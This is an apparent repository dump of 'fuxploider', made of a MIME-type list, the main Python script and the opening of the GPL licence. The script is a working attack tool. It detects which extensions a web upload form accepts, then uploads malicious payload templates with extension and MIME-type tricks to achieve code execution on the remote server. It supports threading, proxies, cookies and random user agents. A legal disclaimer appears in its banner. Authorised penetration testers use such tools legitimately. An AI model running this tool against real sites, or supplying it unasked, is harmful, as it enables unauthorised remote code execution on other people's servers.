dcm 50 | application/dsptype tsp 51 | application/font-tdpfr pfr 52 | application/font-woff woff 53 | application/futuresplash spl 54 | application/hta hta 55 | application/java-archive jar 56 | application/java-serialized-object ser 57 | application/java-vm class 58 | application/m3g m3g 59 | application/mac-binhex40 hqx 60 | application/mac-compactpro cpt 61 | application/mathematica nb nbp 62 | application/mbox mbox 63 | application/msaccess mdb 64 | application/mxf mxf 65 | application/octet-stream bin deploy msu msp 66 | application/oda oda 67 | application/oebps-package+xml opf 68 | application/ogg ogx 69 | application/onenote one onetoc2 onetmp onepkg 70 | application/pgp-encrypted pgp 71 | application/pgp-keys key 72 | application/pgp-signature sig 73 | application/pics-rules prf 74 | application/sla stl 75 | application/smil+xml smi smil 76 | application/xhtml+xml xhtml xht 77 | application/xml xml xsd 78 | text/asp asp 79 | application/xslt+xml xsl xslt 80 | application/xspf+xml xspf 81 | application/vnd.android.package-archive apk 82 | application/vnd.cinderella cdy 83 | application/vnd.debian.binary-package deb ddeb udeb 84 | application/vnd.font-fontforge-sfd sfd 85 | application/vnd.google-earth.kml+xml kml 86 | application/vnd.google-earth.kmz kmz 87 | application/vnd.mozilla.xul+xml xul 88 | application/vnd.ms-fontobject eot 89 | application/vnd.ms-officetheme thmx 90 | application/vnd.ms-pki.seccat cat 91 | application/vnd.ms-pki.stl stl 92 | application/vnd.oasis.opendocument.chart odc 93 | application/vnd.oasis.opendocument.database odb 94 | application/vnd.oasis.opendocument.formula odf 95 | application/vnd.oasis.opendocument.graphics odg 96 | application/vnd.oasis.opendocument.graphics-template otg 97 | application/vnd.oasis.opendocument.image odi 98 | application/vnd.oasis.opendocument.presentation odp 99 | application/vnd.oasis.opendocument.presentation-template otp 100 | application/vnd.oasis.opendocument.spreadsheet ods 101 | application/vnd.oasis.opendocument.spreadsheet-template ots 102 | application/vnd.oasis.opendocument.text odt 103 | application/vnd.oasis.opendocument.text-master odm 104 | application/vnd.oasis.opendocument.text-template ott 105 | application/vnd.oasis.opendocument.text-web oth 106 | application/vnd.rim.cod cod 107 | application/vnd.smaf mmf 108 | application/vnd.stardivision.calc sdc 109 | application/vnd.stardivision.chart sds 110 | application/vnd.stardivision.draw sda 111 | application/vnd.stardivision.impress sdd 112 | application/vnd.stardivision.math sdf 113 | application/vnd.stardivision.writer sdw 114 | application/vnd.stardivision.writer-global sgl 115 | application/vnd.sun.xml.calc sxc 116 | application/vnd.sun.xml.calc.template stc 117 | application/vnd.sun.xml.draw sxd 118 | application/vnd.sun.xml.draw.template std 119 | application/vnd.sun.xml.impress sxi 120 | application/vnd.sun.xml.impress.template sti 121 | application/vnd.sun.xml.math sxm 122 | application/vnd.sun.xml.writer sxw 123 | application/vnd.sun.xml.writer.global sxg 124 | application/vnd.sun.xml.writer.template stw 125 | application/vnd.symbian.install sis 126 | application/vnd.tcpdump.pcap cap pcap 127 | application/vnd.visio vsd vst vsw vss 128 | application/vnd.wap.wbxml wbxml 129 | application/vnd.wap.wmlc wmlc 130 | application/vnd.wap.wmlscriptc wmlsc 131 | application/vnd.wordperfect wpd 132 | application/vnd.wordperfect5.1 wp5 133 | application/x-123 wk 134 | application/x-abiword abw 135 | application/x-apple-diskimage dmg 136 | application/x-bcpio bcpio 137 | application/x-bittorrent torrent 138 | application/x-cab cab 139 | application/x-cbr cbr 140 | application/x-cbz cbz 141 | application/x-cdf cdf cda 142 | application/x-cdlink vcd 143 | application/x-chess-pgn pgn 144 | application/x-comsol mph 145 | application/x-cpio cpio 146 | application/x-csh csh 147 | application/x-debian-package deb udeb 148 | application/x-director dcr dir dxr 149 | application/x-dms dms 150 | application/x-doom wad 151 | application/x-dvi dvi 152 | application/x-font pfa pfb gsf 153 | application/x-font-pcf pcf pcf.Z 154 | application/x-freemind mm 155 | application/x-futuresplash spl 156 | application/x-ganttproject gan 157 | application/x-gnumeric gnumeric 158 | application/x-go-sgf sgf 159 | application/x-graphing-calculator gcf 160 | application/x-gtar gtar 161 | application/x-gtar-compressed tgz taz 162 | application/x-hdf hdf 163 | application/x-httpd-eruby rhtml 164 | application/x-httpd-php phtml pht php 165 | application/x-httpd-php-source phps 166 | application/x-httpd-php3 php3 167 | application/x-httpd-php3-preprocessed php3p 168 | application/x-httpd-php4 php4 169 | application/x-httpd-php5 php5 170 | application/x-hwp hwp 171 | application/x-ica ica 172 | application/x-info info 173 | application/x-internet-signup ins isp 174 | application/x-iphone iii 175 | application/x-iso9660-image iso 176 | application/x-jam jam 177 | application/x-java-jnlp-file jnlp 178 | application/x-jmol jmz 179 | application/x-kchart chrt 180 | application/x-killustrator kil 181 | application/x-koan skp skd skt skm 182 | application/x-kpresenter kpr kpt 183 | application/x-kspread ksp 184 | application/x-kword kwd kwt 185 | application/x-latex latex 186 | application/x-lha lha 187 | application/x-lyx lyx 188 | application/x-lzh lzh 189 | application/x-lzx lzx 190 | application/x-maker frm maker frame fm fb book fbdoc 191 | application/x-mif mif 192 | application/x-mpegURL m3u8 193 | application/x-ms-application application 194 | application/x-ms-manifest manifest 195 | application/x-ms-wmd wmd 196 | application/x-ms-wmz wmz 197 | application/x-msdos-program com exe bat dll 198 | application/x-msi msi 199 | application/x-netcdf nc 200 | application/x-ns-proxy-autoconfig pac 201 | application/x-nwc nwc 202 | application/x-object o 203 | application/x-oz-application oza 204 | application/x-pkcs7-certreqresp p7r 205 | application/x-pkcs7-crl crl 206 | application/x-python-code pyc pyo 207 | application/x-qgis qgs shp shx 208 | application/x-quicktimeplayer qtl 209 | application/x-rdp rdp 210 | application/x-redhat-package-manager rpm 211 | application/x-rss+xml rss 212 | application/x-ruby rb 213 | application/x-scilab sci sce 214 | application/x-scilab-xcos xcos 215 | application/x-sh sh 216 | application/x-shar shar 217 | application/x-shockwave-flash swf swfl 218 | application/x-silverlight scr 219 | application/x-sql sql 220 | application/x-stuffit sit sitx 221 | application/x-sv4cpio sv4cpio 222 | application/x-sv4crc sv4crc 223 | application/x-tar tar 224 | application/x-tcl tcl 225 | application/x-tex-gf gf 226 | application/x-tex-pk pk 227 | application/x-texinfo texinfo texi 228 | application/x-trash ~ % bak old sik 229 | application/x-troff t tr roff 230 | application/x-troff-man man 231 | application/x-troff-me me 232 | application/x-troff-ms ms 233 | application/x-ustar ustar 234 | application/x-wais-source src 235 | application/x-wingz wz 236 | application/x-x509-ca-cert crt 237 | application/x-xcf xcf 238 | application/x-xfig fig 239 | application/x-xpinstall xpi 240 | application/x-xz xz 241 | audio/amr amr 242 | audio/amr-wb awb 243 | audio/annodex axa 244 | audio/basic au snd 245 | audio/csound csd orc sco 246 | audio/flac flac 247 | audio/midi mid midi kar 248 | audio/mpeg mpga mpega mp2 mp3 m4a 249 | audio/mpegurl m3u 250 | audio/ogg oga ogg opus spx 251 | audio/prs.sid sid 252 | audio/x-aiff aif aiff aifc 253 | audio/x-gsm gsm 254 | audio/x-mpegurl m3u 255 | audio/x-ms-wma wma 256 | audio/x-ms-wax wax 257 | audio/x-pn-realaudio ra rm ram 258 | audio/x-realaudio ra 259 | audio/x-scpls pls 260 | audio/x-sd2 sd2 261 | audio/x-wav wav 262 | chemical/x-alchemy alc 263 | chemical/x-cache cac cache 264 | chemical/x-cache-csf csf 265 | chemical/x-cactvs-binary cbin cascii ctab 266 | chemical/x-cdx cdx 267 | chemical/x-cerius cer 268 | chemical/x-chem3d c3d 269 | chemical/x-chemdraw chm 270 | chemical/x-cif cif 271 | chemical/x-cmdf cmdf 272 | chemical/x-cml cml 273 | chemical/x-compass cpa 274 | chemical/x-crossfire bsd 275 | chemical/x-csml csml csm 276 | chemical/x-ctx ctx 277 | chemical/x-cxf cxf cef 278 | chemical/x-daylight-smiles smi 279 | chemical/x-embl-dl-nucleotide emb embl 280 | chemical/x-galactic-spc spc 281 | chemical/x-gamess-input inp gam gamin 282 | chemical/x-gaussian-checkpoint fch fchk 283 | chemical/x-gaussian-cube cub 284 | chemical/x-gaussian-input gau gjc gjf 285 | chemical/x-gaussian-log gal 286 | chemical/x-gcg8-sequence gcg 287 | chemical/x-genbank gen 288 | chemical/x-hin hin 289 | chemical/x-isostar istr ist 290 | chemical/x-jcamp-dx jdx dx 291 | chemical/x-kinemage kin 292 | chemical/x-macmolecule mcm 293 | chemical/x-macromodel-input mmd mmod 294 | chemical/x-mdl-molfile mol 295 | chemical/x-mdl-rdfile rd 296 | chemical/x-mdl-rxnfile rxn 297 | chemical/x-mdl-sdfile sd sdf 298 | chemical/x-mdl-tgf tgf 299 | chemical/x-mif mif 300 | chemical/x-mmcif mcif 301 | chemical/x-mol2 mol2 302 | chemical/x-molconn-Z b 303 | chemical/x-mopac-graph gpt 304 | chemical/x-mopac-input mop mopcrt mpc zmt 305 | chemical/x-mopac-out moo 306 | chemical/x-mopac-vib mvb 307 | chemical/x-ncbi-asn1 asn 308 | chemical/x-ncbi-asn1-ascii prt ent 309 | chemical/x-ncbi-asn1-binary val aso 310 | chemical/x-ncbi-asn1-spec asn 311 | chemical/x-pdb pdb ent 312 | chemical/x-rosdal ros 313 | chemical/x-swissprot sw 314 | chemical/x-vamas-iso14976 vms 315 | chemical/x-vmd vmd 316 | chemical/x-xtel xtel 317 | chemical/x-xyz xyz 318 | image/ief ief 319 | image/jp2 jp2 jpg2 320 | image/jpm jpm 321 | image/jpx jpx jpf 322 | image/pcx pcx 323 | image/svg+xml svg svgz 324 | image/vnd.djvu djvu djv 325 | image/vnd.microsoft.icon ico 326 | image/vnd.wap.wbmp wbmp 327 | image/x-canon-cr2 cr2 328 | image/x-canon-crw crw 329 | image/x-cmu-raster ras 330 | image/x-coreldraw cdr 331 | image/x-coreldrawpattern pat 332 | image/x-coreldrawtemplate cdt 333 | image/x-corelphotopaint cpt 334 | image/x-epson-erf erf 335 | image/x-jg art 336 | image/x-jng jng 337 | image/x-nikon-nef nef 338 | image/x-olympus-orf orf 339 | image/x-photoshop psd 340 | image/x-portable-anymap pnm 341 | image/x-portable-bitmap pbm 342 | image/x-portable-graymap pgm 343 | image/x-portable-pixmap ppm 344 | image/x-rgb rgb 345 | image/x-xbitmap xbm 346 | image/x-xpixmap xpm 347 | image/x-xwindowdump xwd 348 | message/rfc822 eml 349 | model/iges igs iges 350 | model/mesh msh mesh silo 351 | model/vrml wrl vrml 352 | model/x3d+vrml x3dv 353 | model/x3d+xml x3d 354 | model/x3d+binary x3db 355 | text/cache-manifest appcache 356 | text/calendar ics icz 357 | text/css css 358 | text/csv csv 359 | text/h323 323 360 | text/html html htm shtml 361 | text/iuls uls 362 | text/mathml mml 363 | text/richtext rtx 364 | text/scriptlet sct wsc 365 | text/texmacs tm 366 | text/tab-separated-values tsv 367 | text/turtle ttl 368 | text/vcard vcf vcard 369 | text/vnd.sun.j2me.app-descriptor jad 370 | text/vnd.wap.wml wml 371 | text/vnd.wap.wmlscript wmls 372 | text/x-bibtex bib 373 | text/x-boo boo 374 | text/x-c++hdr h++ hpp hxx hh 375 | text/x-c++src c++ cpp cxx cc 376 | text/x-chdr h 377 | text/x-component htc 378 | text/x-csh csh 379 | text/x-csrc c 380 | text/x-dsrc d 381 | text/x-diff diff patch 382 | text/x-haskell hs 383 | text/x-java java 384 | text/x-lilypond ly 385 | text/x-literate-haskell lhs 386 | text/x-moc moc 387 | text/x-pascal p pas 388 | text/x-pcs-gcd gcd 389 | text/x-perl pl pm 390 | text/x-python py 391 | text/x-scala scala 392 | text/x-setext etx 393 | text/x-sfv sfv 394 | text/x-sh sh 395 | text/x-tcl tcl tk 396 | text/x-tex tex ltx sty cls 397 | text/x-vcalendar vcs 398 | video/3gpp 3gp 399 | video/annodex axv 400 | video/dl dl 401 | video/dv dif dv 402 | video/fli fli 403 | video/gl gl 404 | video/mpeg mpeg mpg mpe 405 | video/MP2T ts 406 | video/mp4 mp4 407 | video/quicktime qt mov 408 | video/ogg ogv 409 | video/webm webm 410 | video/vnd.mpegurl mxu 411 | video/x-flv flv 412 | video/x-la-asf lsf lsx 413 | video/x-mng mng 414 | video/x-ms-asf asf asx 415 | video/x-ms-wm wm 416 | video/x-ms-wmv wmv 417 | video/x-ms-wmx wmx 418 | video/x-ms-wvx wvx 419 | video/x-msvideo avi 420 | video/x-sgi-movie movie 421 | video/x-matroska mpv mkv 422 | x-conference/x-cooltalk ice 423 | x-epoc/x-sisx-app sisx 424 | x-world/x-vrml vrm vrml wrl -------------------------------------------------------------------------------- /fuxploider.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import os 4 | import argparse 5 | import logging 6 | import datetime 7 | import getpass 8 | import json 9 | import random 10 | import concurrent.futures 11 | 12 | import coloredlogs 13 | import requests 14 | import sys 15 | 16 | from utils import * 17 | from UploadForm import UploadForm 18 | from threading import Lock 19 | 20 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 21 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 22 | 23 | __version__ = "1.0.0" 24 | logging.basicConfig(datefmt='[%m/%d/%Y-%H:%M:%S]') 25 | logger = logging.getLogger("fuxploider") 26 | coloredlogs.install( 27 | logger=logger, 28 | fmt='%(asctime)s %(levelname)s - %(message)s', 29 | level=logging.INFO 30 | ) 31 | logging.getLogger("requests").setLevel(logging.ERROR) 32 | 33 | #################### TEMPLATES DEFINITION HERE ###################### 34 | templatesFolder = "payloads" 35 | with open("templates.json", "r", encoding='utf-8') as fd: 36 | templates = json.loads(fd.read()) 37 | 38 | ####################################################################### 39 | templatesNames = [t["templateName"] for t in templates] 40 | templatesSection = ("[TEMPLATES]\nTemplates are malicious payloads meant to be uploaded " 41 | "on the scanned remote server. Code execution detection is done " 42 | "based on the expected output of the payload.") 43 | templatesSection += "\n\tDefault templates are the following (name - description): " 44 | for t in templates: 45 | templatesSection += "\n\t * '{templateName}' - '{description}'".format( 46 | templateName=t["templateName"], 47 | description=t["description"] 48 | ) 49 | 50 | parser = argparse.ArgumentParser( 51 | epilog=templatesSection, 52 | description=__doc__, 53 | formatter_class=argparse.RawTextHelpFormatter 54 | ) 55 | parser.add_argument("-d", "--data", metavar="postData", dest="data", help="Additionnal data to be transmitted via POST method. Example: -d \"key1=value1&key2=value2\"", type=valid_postData) 56 | parser.add_argument("--proxy", metavar="proxyUrl", dest="proxy", help="Proxy information. Example: --proxy \"user:password@proxy.host:8080\"", type=valid_proxyString) 57 | parser.add_argument("--proxy-creds", metavar="credentials", nargs='?', const=True, dest="proxyCreds", help="Prompt for proxy credentials at runtime. Format: 'user:pass'", type=valid_proxyCreds) 58 | parser.add_argument("-f", "--filesize", metavar="integer", nargs=1, default=["10"], dest="size", help="File size to use for files to be created and uploaded (in kB).") 59 | parser.add_argument("--cookies", metavar="omnomnom", nargs=1, dest="cookies", help="Cookies to use with HTTP requests. Example: PHPSESSID=aef45aef45afeaef45aef45&JSESSID=AQSEJHQSQSG", type=valid_postData) 60 | parser.add_argument("--uploads-path", default=[None], metavar="path", nargs=1, dest="uploadsPath", help="Path on the remote server where uploads are put. Example: '/tmp/uploads/'") 61 | parser.add_argument("-t", "--template", metavar="templateName", nargs=1, dest="template", help="Malicious payload to use for code execution detection. Default is to use every known templates. For a complete list of templates, see the TEMPLATE section.") 62 | parser.add_argument("-r", "--regex-override", metavar="regex", nargs=1, dest="regexOverride", help="Specify a regular expression to detect code execution. Overrides the default code execution detection regex defined in the template in use.", type=valid_regex) 63 | 64 | requiredNamedArgs = parser.add_argument_group('Required named arguments') 65 | requiredNamedArgs.add_argument("-u", "--url", metavar="target", dest="url", required=True, help="Web page URL containing the file upload form to be tested. Example: http://test.com/index.html?action=upload", type=valid_url) 66 | requiredNamedArgs.add_argument("--not-regex", metavar="regex", help="Regex matching an upload failure", type=valid_regex, dest="notRegex") 67 | requiredNamedArgs.add_argument("--true-regex", metavar="regex", help="Regex matching an upload success", type=valid_regex, dest="trueRegex") 68 | 69 | exclusiveArgs = parser.add_mutually_exclusive_group() 70 | exclusiveArgs.add_argument("-l", "--legit-extensions", metavar="listOfExtensions", dest="legitExtensions", nargs=1, help="Legit extensions expected, for a normal use of the form, comma separated. Example: 'jpg,png,bmp'") 71 | exclusiveArgs.add_argument("-n", metavar="n", nargs=1, default=["100"], dest="n", help="Number of common extensions to use. Example: -n 100", type=valid_nArg) 72 | 73 | exclusiveVerbosityArgs = parser.add_mutually_exclusive_group() 74 | exclusiveVerbosityArgs.add_argument("-v", action="store_true", required=False, dest="verbose", help="Verbose mode") 75 | exclusiveVerbosityArgs.add_argument("-vv", action="store_true", required=False, dest="veryVerbose", help="Very verbose mode") 76 | exclusiveVerbosityArgs.add_argument("-vvv", action="store_true", required=False, dest="veryVeryVerbose", help="Much verbose, very log, wow.") 77 | 78 | parser.add_argument("-s", "--skip-recon", action="store_true", required=False, dest="skipRecon", help="Skip recon phase, where fuxploider tries to determine what extensions are expected and filtered by the server. Needs -l switch.") 79 | parser.add_argument("-y", action="store_true", required=False, dest="detectAllEntryPoints", help="Force detection of every entry points. Will not stop at first code exec found.") 80 | parser.add_argument("-T", "--threads", metavar="Threads", nargs=1, dest="nbThreads", help="Number of parallel tasks (threads).", type=int, default=[4]) 81 | 82 | exclusiveUserAgentsArgs = parser.add_mutually_exclusive_group() 83 | exclusiveUserAgentsArgs.add_argument("-U", "--user-agent", metavar="useragent", nargs=1, dest="userAgent", help="User-agent to use while requesting the target.", type=str, default=[requests.utils.default_user_agent()]) 84 | exclusiveUserAgentsArgs.add_argument("--random-user-agent", action="store_true", required=False, dest="randomUserAgent", help="Use a random user-agent while requesting the target.") 85 | 86 | manualFormArgs = parser.add_argument_group('Manual Form Detection arguments') 87 | manualFormArgs.add_argument("-m", "--manual-form-detection", action="store_true", dest="manualFormDetection", help="Disable automatic form detection. Useful when automatic detection fails due to: (1) Form loaded using Javascript (2) Multiple file upload forms in URL.") 88 | manualFormArgs.add_argument("--input-name", metavar="image", dest="inputName", help="Name of input for file. Example: ") 89 | manualFormArgs.add_argument("--form-action", default="", metavar="upload.php", dest="formAction", help="Path of form action. Example:
") 90 | 91 | args = parser.parse_args() 92 | args.uploadsPath = args.uploadsPath[0] 93 | args.nbThreads = args.nbThreads[0] 94 | args.userAgent = args.userAgent[0] 95 | 96 | if args.randomUserAgent: 97 | with open("user-agents.txt","r") as fd: 98 | nb = 0 99 | for l in fd: 100 | nb += 1 101 | fd.seek(0) 102 | nb = random.randint(0, nb) 103 | for i in range(0, nb): 104 | args.userAgent = fd.readline()[:-1] 105 | 106 | if args.template: 107 | args.template = args.template[0] 108 | if args.template not in templatesNames: 109 | logging.warning("Unknown template: %s", args.template) 110 | cont = input("Use default templates instead ? [Y/n]") 111 | if not cont.lower().startswith("y"): 112 | sys.exit() 113 | else: 114 | templates = [[x for x in templates if x["templateName"] == args.template][0]] 115 | if args.regexOverride: 116 | for t in templates: 117 | t["codeExecRegex"] = args.regexOverride[0] 118 | 119 | args.verbosity = 0 120 | if args.verbose: 121 | args.verbosity = 1 122 | if args.veryVerbose: 123 | args.verbosity = 2 124 | if args.veryVeryVerbose: 125 | args.verbosity = 3 126 | logger.verbosity = args.verbosity 127 | if args.verbosity > 0: 128 | coloredlogs.install( 129 | logger=logger, 130 | fmt='%(asctime)s %(levelname)s - %(message)s', 131 | level=logging.DEBUG 132 | ) 133 | 134 | 135 | if args.proxyCreds and args.proxy == None: 136 | parser.error("--proxy-creds must be used with --proxy.") 137 | 138 | if args.skipRecon and args.legitExtensions == None: 139 | parser.error("-s switch needs -l switch. Cannot skip recon phase without any known entry point.") 140 | 141 | args.n = int(args.n[0]) 142 | args.size = int(args.size[0]) 143 | args.size = 1024*args.size 144 | 145 | if not args.notRegex and not args.trueRegex: 146 | parser.error("At least one detection method must be provided, either with --not-regex or with --true-regex.") 147 | 148 | if args.legitExtensions: 149 | args.legitExtensions = args.legitExtensions[0].split(",") 150 | 151 | if args.cookies: 152 | args.cookies = postDataFromStringToJSON(args.cookies[0]) 153 | 154 | if args.manualFormDetection and args.inputName is None: 155 | parser.error("--manual-form-detection requires --input-name") 156 | 157 | print("""\033[1;32m 158 | 159 | ___ _ _ _ 160 | | _|_ _ _ _ ___| |___|_|_| |___ ___ 161 | | _| | |_'_| . | | . | | . | -_| _| 162 | |_| |___|_,_| _|_|___|_|___|___|_| 163 | |_| 164 | 165 | \033[1m\033[42m{version """ + __version__ + """}\033[m 166 | 167 | \033[m[!] legal disclaimer: Usage of fuxploider for attacking targets without 168 | prior mutual consent is illegal. It is the end user's responsibility to obey 169 | all applicable local, state and federal laws. Developers assume no liability 170 | and are not responsible for any misuse or damage caused by this program. 171 | """) 172 | if args.proxyCreds is True: 173 | args.proxyCreds = {} 174 | args.proxyCreds["username"] = input("Proxy username: ") 175 | args.proxyCreds["password"] = getpass.getpass("Proxy password: ") 176 | 177 | now = datetime.datetime.now() 178 | 179 | print(f"[*] starting at {now.strftime('%H:%M:%S')}") 180 | 181 | #mimeFile = "mimeTypes.advanced" 182 | mimeFile = "mimeTypes.basic" 183 | extensions = loadExtensions("file", mimeFile) 184 | tmpLegitExt = [] 185 | if args.legitExtensions: 186 | args.legitExtensions = [x.lower() for x in args.legitExtensions] 187 | foundExt = [a[0] for a in extensions] 188 | for b in args.legitExtensions: 189 | if b in foundExt: 190 | tmpLegitExt.append(b) 191 | else: 192 | logging.warning("Extension %s can't be found as a valid/known extension " 193 | "with associated mime type.", b) 194 | args.legitExtensions = tmpLegitExt 195 | 196 | postData = postDataFromStringToJSON(args.data) 197 | 198 | s = requests.Session() 199 | s.verify = False 200 | 201 | if args.cookies: 202 | for key in args.cookies.keys(): 203 | s.cookies[key] = args.cookies[key] 204 | s.headers = {'User-Agent': args.userAgent} 205 | ##### PROXY HANDLING ##### 206 | s.trust_env = False 207 | if args.proxy: 208 | if args.proxy["username"] and args.proxy["password"] and args.proxyCreds: 209 | logging.warning("Proxy username and password provided by the --proxy-creds switch " 210 | "replaces credentials provided using the --proxy switch") 211 | if args.proxyCreds: 212 | proxyUser = args.proxyCreds["username"] 213 | proxyPass = args.proxyCreds["password"] 214 | else: 215 | proxyUser = args.proxy["username"] 216 | proxyPass = args.proxy["password"] 217 | proxyProtocol = args.proxy["protocol"] 218 | proxyHostname = args.proxy["hostname"] 219 | proxyPort = args.proxy["port"] 220 | proxy = "" 221 | if proxyProtocol != None: 222 | proxy += proxyProtocol+"://" 223 | else: 224 | proxy += "http://" 225 | 226 | if proxyUser != None and proxyPass != None: 227 | proxy += proxyUser+":"+proxyPass+"@" 228 | 229 | proxy += proxyHostname 230 | if proxyPort != None: 231 | proxy += ":"+proxyPort 232 | 233 | if proxyProtocol == "https": 234 | proxies = {"https":proxy} 235 | else: 236 | proxies = {"http":proxy,"https":proxy} 237 | 238 | s.proxies.update(proxies) 239 | ######################################################### 240 | 241 | if args.manualFormDetection: 242 | if args.formAction == "": 243 | logger.warning("Using Manual Form Detection and no action specified with --form-action. " 244 | "Defaulting to empty string - meaning form action will be set to --url parameter.") 245 | up = UploadForm(args.notRegex, args.trueRegex, s, args.size, postData, args.uploadsPath, 246 | args.url, args.formAction, args.inputName) 247 | if not args.uploadsPath and args.trueRegex: 248 | print("No uploads path provided, code detection can still be done " 249 | "using true regex capturing group. " 250 | "(Except for templates with a custom codeExecURL)") 251 | cont = input("Do you want to use the True Regex for code execution detection ? [Y/n] ") 252 | if cont.lower().startswith("y") or cont == "": 253 | prefixPattern = input("Prefix capturing group of the true regex with: ") 254 | suffixPattern = input("Suffix capturing group of the true regex with: ") 255 | up.codeExecUrlPattern = "".join((prefixPattern, "$captGroup$", suffixPattern)) 256 | else: 257 | up = UploadForm(args.notRegex, args.trueRegex, s, args.size, postData, args.uploadsPath) 258 | up.setup(args.url) 259 | up.threads = args.nbThreads 260 | ######################################################### 261 | 262 | ############################################################ 263 | uploadURL = up.uploadUrl 264 | fileInput = {"name": up.inputName} 265 | 266 | ###### VALID EXTENSIONS DETECTION FOR THIS FORM ###### 267 | 268 | a = datetime.datetime.now() 269 | 270 | if not args.skipRecon: 271 | if args.legitExtensions: 272 | n = up.detectValidExtensions(extensions, args.n, args.legitExtensions) 273 | else: 274 | n = up.detectValidExtensions(extensions, args.n) 275 | logger.info("### Tried %s extensions, %s are valid.", n, len(up.validExtensions)) 276 | else: 277 | logger.info("### Skipping detection of valid extensions, " 278 | " using provided extensions instead (%s).", args.legitExtensions) 279 | up.validExtensions = args.legitExtensions 280 | 281 | if up.validExtensions == []: 282 | logger.error("No valid extension found.") 283 | sys.exit() 284 | 285 | b = datetime.datetime.now() 286 | print("Extensions detection: "+str(b-a)) 287 | 288 | 289 | ######################################################################################## 290 | ######################################################################################## 291 | cont = input("Start uploading payloads? [Y/n]: ") 292 | up.shouldLog = True 293 | if cont.lower().startswith("y") or cont == "": 294 | pass 295 | else: 296 | sys.exit("Exiting.") 297 | 298 | entryPoints = [] 299 | up.stopThreads = True 300 | 301 | with open("techniques.json", "r") as rawTechniques: 302 | techniques = json.loads(rawTechniques.read()) 303 | logger.info("### Starting code execution detection " 304 | "(messing with file extensions and mime types...)") 305 | c = datetime.datetime.now() 306 | nbOfEntryPointsFound = 0 307 | attempts = [] 308 | templatesData = {} 309 | 310 | for template in templates: 311 | with open(os.path.join((templatesFolder + "/" + template["filename"])), 'rb') as templatefd: 312 | templatesData[template["templateName"]] = templatefd.read() 313 | nastyExt = template.get("nastyExt") 314 | nastyMime = None if nastyExt is None else getMime(extensions, nastyExt) 315 | nastyExtVariants = template.get("extVariants") 316 | codeExecURL = template.get("codeExecURL") 317 | dynamicPayload = template.get("dynamicPayload") 318 | staticFilename = template.get("staticFilename") 319 | for legitExt in up.validExtensions: 320 | legitMime = getMime(extensions, legitExt) 321 | if nastyExt is None: 322 | attempts.append({ 323 | "suffix": "." + legitExt, 324 | "mime": legitMime, 325 | "templateName": template["templateName"], 326 | "codeExecURL": codeExecURL, 327 | "dynamicPayload": dynamicPayload, 328 | "payloadFilename": template["filename"], 329 | "staticFilename": staticFilename 330 | }) 331 | continue 332 | for technique in techniques: 333 | for nastyVariant in [nastyExt] + nastyExtVariants: 334 | legitMime = getMime(extensions, legitExt) 335 | mime = legitMime if technique["mime"] == "legit" else nastyMime 336 | suffix = technique["suffix"].replace("$legitExt$", legitExt) \ 337 | .replace("$nastyExt$", nastyVariant) 338 | attempts.append({ 339 | "suffix": suffix, 340 | "mime": mime, 341 | "templateName": template["templateName"], 342 | "codeExecURL": codeExecURL, 343 | "dynamicPayload": dynamicPayload, 344 | "payloadFilename": template["filename"], 345 | "staticFilename": staticFilename 346 | }) 347 | 348 | 349 | stopThreads = False 350 | 351 | attemptsTested = 0 352 | 353 | with concurrent.futures.ThreadPoolExecutor(max_workers=args.nbThreads) as executor: 354 | futures = [] 355 | try: 356 | for a in attempts: 357 | payloadFilename = a["payloadFilename"] 358 | # If template uses a static filename, set the suffix to that of the filename. 359 | if a["staticFilename"]: 360 | a["suffix"] = payloadFilename.split('.', 1)[1] 361 | suffix = a["suffix"] 362 | mime = a["mime"] 363 | payload = templatesData[a["templateName"]] 364 | codeExecRegex = [t["codeExecRegex"] for t in templates if t["templateName"] == a["templateName"]][0] 365 | codeExecURL = a["codeExecURL"] 366 | dynamicPayload = a["dynamicPayload"] 367 | staticFilename = a["staticFilename"] 368 | 369 | f = executor.submit( 370 | up.submitTestCase, 371 | suffix, 372 | mime, 373 | payload, 374 | codeExecRegex, 375 | codeExecURL, 376 | dynamicPayload, 377 | payloadFilename, 378 | staticFilename 379 | ) 380 | f.a = a 381 | futures.append(f) 382 | 383 | for future in concurrent.futures.as_completed(futures): 384 | res = future.result() 385 | attemptsTested += 1 386 | if not stopThreads: 387 | if res["codeExec"]: 388 | foundEntryPoint = future.a 389 | logging.info("\033[1m\033[42mCode execution obtained ('%s','%s','%s','%s')\033[m", 390 | foundEntryPoint["suffix"], 391 | foundEntryPoint["mime"], 392 | foundEntryPoint["templateName"], 393 | res["url"]) 394 | nbOfEntryPointsFound += 1 395 | entryPoints.append(foundEntryPoint) 396 | 397 | if not args.detectAllEntryPoints: 398 | raise KeyboardInterrupt 399 | 400 | except KeyboardInterrupt: 401 | stopThreads = True 402 | executor.shutdown(wait=False) 403 | executor._threads.clear() 404 | concurrent.futures.thread._threads_queues.clear() 405 | logger.setLevel(logging.CRITICAL) 406 | logger.verbosity = -1 407 | 408 | 409 | ################################################################################################################################################ 410 | ################################################################################################################################################ 411 | d = datetime.datetime.now() 412 | #print("Code exec detection: "+str(d-c)) 413 | logging.info("%s entry point(s) found using %s HTTP requests.", nbOfEntryPointsFound, up.httpRequests) 414 | print("\nFound the following entry points: ") 415 | print(entryPoints) 416 | 417 | -------------------------------------------------------------------------------- /LICENSE.md: -------------------------------------------------------------------------------- 1 | ### GNU GENERAL PUBLIC LICENSE 2 | 3 | Version 3, 29 June 2007 4 | 5 | Copyright (C) 2007 Free Software Foundation, Inc. 6 | 7 | 8 | Everyone is permitted to copy and distribute verbatim copies of this 9 | license document, but changing it is not allowed. 10 | 11 | ### Preamble 12 | 13 | The GNU General Public License is a free, copyleft license for 14 | software and other kinds of works. 15 | 16 | The licenses for most software and other practical works are designed 17 | to take away your freedom to share and change the works. By contrast, 18 | the GNU General Public License is intended to guarantee your freedom 19 | to share and change all versions of a program--to make sure it remains 20 | free software for all its users. We, the Free Software Foundation, use 21 | the GNU General Public License for most of our software; it applies 22 | also to any other work released this way by its authors. You can apply 23 | it to your programs, too. 24 | 25 | When we speak of free software, we are referring to freedom, not 26 | price. Our General Public Licenses are designed to make sure that you 27 | have the freedom to distribute copies of free software (and charge for 28 | them if you wish), that you receive source code or can get it if you 29 | want it, that you can change the software or use pieces of it in new 30 | free programs, and that you know you can do these things. 31 | 32 | To protect your rights, we need to prevent others from denying you 33 | these rights or asking you to surrender the rights. Therefore, you 34 | have certain responsibilities if you distribute copies of the 35 | software, or if you modify it: 